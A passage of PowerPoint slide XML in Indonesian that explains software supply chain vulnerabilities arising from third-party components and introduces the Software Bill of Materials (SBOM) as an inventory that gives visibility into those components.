              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengekspos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hubungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implisit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditempatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Daftar Bahan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Bill of Material (BOM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inventaris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perpustakaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rincian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transparansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SBOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
